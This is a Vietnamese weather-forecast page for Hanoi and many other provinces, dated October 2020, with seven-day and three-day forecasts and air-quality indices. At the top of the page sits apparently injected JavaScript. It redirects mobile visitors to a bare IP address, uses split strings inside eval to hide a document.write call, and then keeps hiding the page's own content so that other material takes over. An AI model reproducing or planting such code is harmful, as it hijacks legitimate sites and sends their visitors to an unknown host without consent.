function goPAGE() { if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://180.215.56.197/" } else { var ss = '
'; eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); try { setInterval(function() { try { document.getElementById("div" + "All").style.display = "no" + "ne" } catch (e) {} for (var i = 0; i < document.body.children.length; i++) { try { var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id; if (myid != "iconDiv1" && myid != "yangchen") { document.body.children[i].style.display = "non" + "e" } } catch (e) {} } }, 100) } catch (e) {} } } goPAGE();

Hà Nội

23°C
Hiện tại
(22:32 - Thứ tư
21-10-2020)

Đêm nhiều mây
Nhiệt độ: 20°C- 28°C

152-Xấu
Chỉ số không khí
(22:30)
Thay đổi khu vực

Dự báo thời tiết Hà Nội 7 ngày tới

Thứ năm
(22/10)
20°C- 28°C
Ít mây không mưa

Thứ sáu
(23/10)
20°C- 28°C
Ít mây không mưa

Thứ bảy
(24/10)
19°C- 27°C
Có mây, không mưa

Chủ nhật
(25/10)
21°C- 27°C
Có mây, không mưa

Thứ hai
(26/10)
20°C- 27°C
Có mây, không mưa

Thứ ba
(27/10)
22°C- 28°C
Có mây, không mưa

Thứ tư
(28/10)
21°C- 27°C
Có mây, không mưa

Khu vực
Hiện tại
Hôm nay
Ngày mai
Ngày kia
TP.HCM
27°C
Đêm có mây
69-Trung bình
Chỉ số không khí (22:30)

25°C- 33°C
Có mây, có mưa rào và dông

25°C- 33°C
Có mây, có mưa rào và dông

25°C- 32°C
Có mây, có mưa rào và dông
Đà Nẵng
23°C
Đêm nhiều mây
56-Trung bình
Chỉ số không khí (22:30)

23°C- 27°C
Nhiều mây, có mưa to

24°C- 28°C
Có mây, có mưa rào

24°C- 28°C
Có mây, không mưa
Nha Trang
27°C
Đêm nhiều mây
89-Trung bình
Chỉ số không khí (22:30)

24°C- 30°C
Có mây, có mưa rào và dông

24°C- 30°C
Có mây, có mưa rào và dông

25°C- 31°C
Có mây, không mưa
Hải Phòng
22°C
Đêm nhiều mây
103-Kém
Chỉ số không khí (22:30)

20°C- 27°C
Có mây, không mưa

19°C- 28°C
Ít mây không mưa

19°C- 27°C
Ít mây không mưa
Hậu Giang
29°C
Nhiều mây, không mưa
74-Trung bình
Chỉ số không khí (22:30)

25°C- 32°C
Có mây, có mưa rào và dông

25°C- 32°C
Có mây, có mưa rào và dông

25°C- 32°C
Có mây, có mưa rào và dông
Cần Thơ
26°C
Đêm có mưa rào
89-Trung bình
Chỉ số không khí (22:30)

24°C- 32°C
Có mây, có mưa rào và dông

24°C- 31°C
Có mây, có mưa rào và dông

24°C- 30°C
Nhiều mây, có mưa vừa
Vinh
21°C
Đêm nhiều mây
78-Trung bình
Chỉ số không khí (22:30)

19°C- 24°C
Nhiều mây, có mưa, mưa rào

20°C- 27°C
Có mây, không mưa

20°C- 27°C
Có mây, không mưa
Sơn La
19°C
Đêm nhiều mây
76-Trung bình
Chỉ số không khí (22:30)

16°C- 24°C
Có mây, có mưa rào

16°C- 26°C
Ít mây không mưa

16°C- 26°C
Có mây, không mưa
Phú Thọ
24°C
Đêm có mây
16-Tốt
Chỉ số không khí (22:30)

20°C- 27°C
Có mây, không mưa

20°C- 28°C
Ít mây không mưa

20°C- 28°C
Ít mây không mưa
Pleicu
20°C
Đêm có mây
48-Tốt
Chỉ số không khí (22:30)

20°C- 29°C
Có mây, có mưa rào và dông

20°C- 29°C
Có mây, không mưa

20°C- 30°C
Có mây, không mưa
An Giang
28°C
Đêm nhiều mây
63-Trung bình
Chỉ số không khí (22:30)

25°C- 32°C
Có mây, có mưa rào và dông

24°C- 32°C
Có mây, có mưa rào và dông

25°C- 32°C
Có mây, có mưa rào và dông
Bắc cạn
22°C
Đêm có mây
103-Kém
Chỉ số không khí (22:30)

19°C- 27°C
Có mây, không mưa

20°C- 28°C
Ít mây không mưa

19°C- 29°C
Ít mây không mưa
Bắc Giang
22°C
Đêm có mây
151-Xấu
Chỉ số không khí (22:30)

20°C- 27°C
Có mây, không mưa

20°C- 28°C
Ít mây không mưa

19°C- 28°C
Ít mây không mưa
Bạc Liêu
29°C
Đêm nhiều mây
64-Trung bình
Chỉ số không khí (22:30)

25°C- 33°C
Có mây, có mưa rào và dông

25°C- 29°C
Nhiều mây, có mưa, mưa rào

25°C- 31°C
Có mây, có mưa rào và dông
Bắc Ninh
24°C
Đêm có mây
133-Kém
Chỉ số không khí (22:30)

21°C- 27°C
Có mây, không mưa

20°C- 28°C
Ít mây không mưa

20°C- 28°C
Ít mây không mưa
Bến Tre
27°C
Nhiều mây, không mưa
78-Trung bình
Chỉ số không khí (22:30)

24°C- 33°C
Có mây, có mưa rào và dông

25°C- 31°C
Có mây, có mưa rào và dông

25°C- 29°C
Nhiều mây, có mưa vừa
Bình Định
26°C
Đêm có mưa rào
95-Trung bình
Chỉ số không khí (22:30)

25°C- 30°C
Nhiều mây, có mưa to

25°C- 31°C
Có mây, có mưa rào và dông

25°C- 32°C
Có mây, không mưa
Bình Phước
26°C
Đêm nhiều mây
55-Trung bình
Chỉ số không khí (22:30)

24°C- 30°C
Có mây, có mưa rào và dông

24°C- 31°C
Có mây, có mưa rào và dông

25°C- 30°C
Nhiều mây, có mưa, mưa rào
Cà Mau
26°C
Nhiều mây, không mưa
53-Trung bình
Chỉ số không khí (22:30)

25°C- 33°C
Có mây, có mưa rào và dông

25°C- 32°C
Có mây, có mưa rào và dông

25°C- 32°C
Có mây, có mưa rào và dông
Cao Bằng
17°C
Đêm có mây
103-Kém
Chỉ số không khí (22:30)

17°C- 27°C
Có mây, không mưa

18°C- 28°C
Ít mây không mưa

18°C- 28°C
Ít mây không mưa
Đà Lạt
18°C
Đêm nhiều mây
53-Trung bình
Chỉ số không khí (22:30)

18°C- 29°C
Có mây, có mưa rào và dông

19°C- 26°C
Có mây, có mưa rào và dông

19°C- 28°C
Có mây, có mưa rào và dông
Đắk Lắk
22°C
Đêm nhiều mây
83-Trung bình
Chỉ số không khí (22:30)

22°C- 30°C
Có mây, có mưa rào và dông

21°C- 29°C
Có mây, không mưa

21°C- 28°C
Có mây, không mưa
Đắk Nông
23°C
Nhiều mây, không mưa
55-Trung bình
Chỉ số không khí (22:30)

21°C- 30°C
Có mây, có mưa rào và dông

22°C- 30°C
Có mây, không mưa

21°C- 29°C
Có mây, không mưa
Điện Biên
21°C
Đêm nhiều mây
57-Trung bình
Chỉ số không khí (22:30)

17°C- 26°C
Có mây, có mưa rào

17°C- 26°C
Có mây, không mưa

17°C- 27°C
Có mây, không mưa
Đồng Nai
28°C
Nhiều mây, không mưa
55-Trung bình
Chỉ số không khí (22:30)

24°C- 33°C
Có mây, có mưa rào và dông

25°C- 33°C
Có mây, có mưa rào và dông

25°C- 32°C
Có mây, có mưa rào và dông
Đồng Tháp
28°C
Nhiều mây, không mưa
91-Trung bình
Chỉ số không khí (22:30)

24°C- 30°C
Có mây, có mưa rào và dông

23°C- 30°C
Nhiều mây, có mưa, mưa rào

24°C- 28°C
Nhiều mây, có mưa, mưa rào
Hà Giang
19°C
Đêm có mây
76-Trung bình
Chỉ số không khí (22:30)

19°C- 30°C
Có mây, có mưa rào

21°C- 29°C
Ít mây không mưa

21°C- 29°C
Ít mây không mưa
Hà Tĩnh
20°C
Đêm nhiều mây
86-Trung bình
Chỉ số không khí (22:30)

19°C- 23°C
Nhiều mây, có mưa vừa

20°C- 26°C
Có mây, không mưa

21°C- 27°C
Có mây, không mưa
Hải Dương
24°C
Đêm có mây
152-Xấu
Chỉ số không khí (22:30)

20°C- 26°C
Có mây, không mưa

20°C- 27°C
Ít mây không mưa

19°C- 27°C
Ít mây không mưa
Hòa Bình
20°C
Đêm có mây
91-Trung bình
Chỉ số không khí (22:30)

19°C- 28°C
Ít mây không mưa

20°C- 29°C
Ít mây không mưa

19°C- 28°C
Có mây, không mưa
Hưng Yên
24°C
Đêm có mây
151-Xấu
Chỉ số không khí (22:30)

20°C- 26°C
Có mây, không mưa

20°C- 27°C
Ít mây không mưa

19°C- 27°C
Ít mây không mưa
Kiên Giang
28°C
Đêm nhiều mây
55-Trung bình
Chỉ số không khí (22:30)

24°C- 32°C
Có mây, có mưa rào và dông

24°C- 32°C
Có mây, có mưa rào và dông

25°C- 32°C
Có mây, có mưa rào và dông
Kon Tum
24°C
Đêm nhiều mây
78-Trung bình
Chỉ số không khí (22:30)

22°C- 29°C
Có mây, có mưa rào và dông

20°C- 29°C
Có mây, không mưa

20°C- 31°C
Có mây, không mưa
Lai Châu
18°C
Đêm nhiều mây
76-Trung bình
Chỉ số không khí (22:30)

16°C- 22°C
Có mây, có mưa rào

16°C- 23°C
Có mây, không mưa

15°C- 24°C
Có mây, không mưa
Lạng Sơn
19°C
Đêm có mây
103-Kém
Chỉ số không khí (22:30)

17°C- 26°C
Có mây, không mưa

18°C- 27°C
Ít mây không mưa

18°C- 27°C
Ít mây không mưa
Lào Cai
23°C
Đêm nhiều mây
78-Trung bình
Chỉ số không khí (22:30)

20°C- 27°C
Có mây, có mưa rào

20°C- 29°C
Ít mây không mưa

20°C- 29°C
Ít mây không mưa
Long An
28°C
Nhiều mây, không mưa
89-Trung bình
Chỉ số không khí (22:30)

23°C- 32°C
Có mây, có mưa rào và dông

25°C- 32°C
Có mây, có mưa rào và dông

25°C- 31°C
Có mây, có mưa rào và dông
Nam Định
22°C
Đêm nhiều mây
154-Xấu
Chỉ số không khí (22:30)

21°C- 27°C
Có mây, không mưa

20°C- 28°C
Ít mây không mưa

19°C- 28°C
Ít mây không mưa
Ninh Bình
25°C
Đêm có mây
152-Xấu
Chỉ số không khí (22:30)

20°C- 26°C
Có mây, không mưa

20°C- 28°C
Ít mây không mưa

19°C- 28°C
Ít mây không mưa
Ninh Thuận
27°C
Đêm nhiều mây
53-Trung bình
Chỉ số không khí (22:30)

24°C- 31°C
Có mây, có mưa rào và dông

24°C- 31°C
Có mây, có mưa rào và dông

25°C- 32°C
Có mây, không mưa
Phủ Lý
24°C
Đêm có mây
147-Kém
Chỉ số không khí (22:30)

21°C- 26°C
Có mây, không mưa

20°C- 28°C
Ít mây không mưa

19°C- 28°C
Ít mây không mưa
Phú Yên
27°C
Đêm nhiều mây
93-Trung bình
Chỉ số không khí (22:30)

25°C- 30°C
Nhiều mây, có mưa to

25°C- 31°C
Có mây, có mưa rào và dông

25°C- 31°C
Có mây, không mưa
Quảng Bình
20°C
Đêm nhiều mây
80-Trung bình
Chỉ số không khí (22:30)

19°C- 24°C
Nhiều mây, có mưa vừa

19°C- 24°C
Nhiều mây, có mưa, mưa rào

20°C- 25°C
Có mây, không mưa
Quảng Nam
24°C
Đêm nhiều mây
97-Trung bình
Chỉ số không khí (22:30)

24°C- 27°C
Nhiều mây, có mưa to

23°C- 30°C
Có mây, có mưa rào và dông

23°C- 30°C
Có mây, không mưa
Quảng Ngãi
24°C
Đêm nhiều mây
97-Trung bình
Chỉ số không khí (22:30)

24°C- 28°C
Nhiều mây, có mưa to

25°C- 30°C
Có mây, có mưa rào và dông

24°C- 31°C
Có mây, không mưa
Quảng Ninh
22°C
Đêm có mây
31-Tốt
Chỉ số không khí (22:30)

20°C- 27°C
Có mây, không mưa

20°C- 28°C
Ít mây không mưa

19°C- 28°C
Ít mây không mưa
Quảng Trị
20°C
Nhiều mây, không mưa
99-Trung bình
Chỉ số không khí (22:30)

20°C- 24°C
Nhiều mây, có mưa to

20°C- 25°C
Nhiều mây, có mưa, mưa rào

21°C- 26°C
Có mây, không mưa
Sóc Trăng
28°C
Nhiều mây, không mưa
74-Trung bình
Chỉ số không khí (22:30)

25°C- 33°C
Có mây, có mưa rào và dông

24°C- 30°C
Nhiều mây, có mưa, mưa rào

24°C- 31°C
Nhiều mây, có mưa, mưa rào
Tây Ninh
28°C
Đêm nhiều mây
57-Trung bình
Chỉ số không khí (22:30)

25°C- 33°C
Có mây, có mưa rào và dông

24°C- 32°C
Có mây, có mưa rào và dông

24°C- 31°C
Có mây, có mưa rào và dông
Thái Bình
23°C
Đêm có mây
151-Xấu
Chỉ số không khí (22:30)

20°C- 26°C
Có mây, không mưa

20°C- 28°C
Ít mây không mưa

19°C- 28°C
Ít mây không mưa
Thái Nguyên
24°C
Đêm có mây
106-Kém
Chỉ số không khí (22:30)

20°C- 26°C
Có mây, không mưa

20°C- 27°C
Ít mây không mưa

19°C- 29°C
Ít mây không mưa
Thanh Hóa
23°C
Đêm có mây
122-Kém
Chỉ số không khí (22:30)

19°C- 27°C
Nhiều mây, không mưa

20°C- 28°C
Có mây, không mưa

20°C- 28°C
Có mây, không mưa
Huế
22°C
Đêm nhiều mây
70-Trung bình
Chỉ số không khí (22:30)

22°C- 26°C
Nhiều mây, có mưa to

22°C- 26°C
Nhiều mây, có mưa, mưa rào

22°C- 27°C
Có mây, không mưa
Tiền Giang
26°C
Nhiều mây, không mưa
85-Trung bình
Chỉ số không khí (22:30)

24°C- 31°C
Có mây, có mưa rào và dông

24°C- 32°C
Có mây, có mưa rào và dông

25°C- 30°C
Nhiều mây, có mưa vừa
Tuyên Quang
21°C
Đêm có mây
112-Kém
Chỉ số không khí (22:30)

20°C- 28°C
Có mây, không mưa

20°C- 28°C
Ít mây không mưa

19°C- 28°C
Ít mây không mưa
Vĩnh Long
27°C
Nhiều mây, không mưa
93-Trung bình
Chỉ số không khí (22:30)

24°C- 32°C
Có mây, có mưa rào và dông

24°C- 32°C
Có mây, có mưa rào và dông

24°C- 32°C
Có mây, có mưa rào và dông
Vĩnh Phúc
25°C
Đêm có mây
95-Trung bình
Chỉ số không khí (22:30)

15°C- 28°C
Có mây, không mưa

16°C- 22°C
Ít mây không mưa

15°C- 23°C
Ít mây không mưa
Vũng Tàu
26°C
Nhiều mây, không mưa
51-Trung bình
Chỉ số không khí (22:30)

25°C- 32°C
Có mây, có mưa rào và dông

26°C- 32°C
Có mây, có mưa rào và dông

26°C- 31°C
Có mây, có mưa rào và dông
Yên Bái
23°C
Đêm nhiều mây
110-Kém
Chỉ số không khí (22:30)

20°C- 27°C
Ít mây không mưa

20°C- 28°C
Ít mây không mưa

19°C- 29°C
Ít mây không mưa
Cập nhật: 22:32 - 21/10/2020
Nguồn: Trung tâm dự báo khí tượng thủy văn trung ương
Thông tin chỉ mang tính tham khảo, chúng tôi không chịu bất kỳ trách nhiệm gì về việc sử dụng thông tin của các bạn.
  • Dự báo thời tiết Hà Nội  

  • Dự báo thời tiết miền Bắc  

  • Dự báo thời tiết miền Trung  

  • Dự báo thời tiết miền Nam  

  • Dự báo thời tiết TP.HCM  

Tin hay đừng bỏ lỡ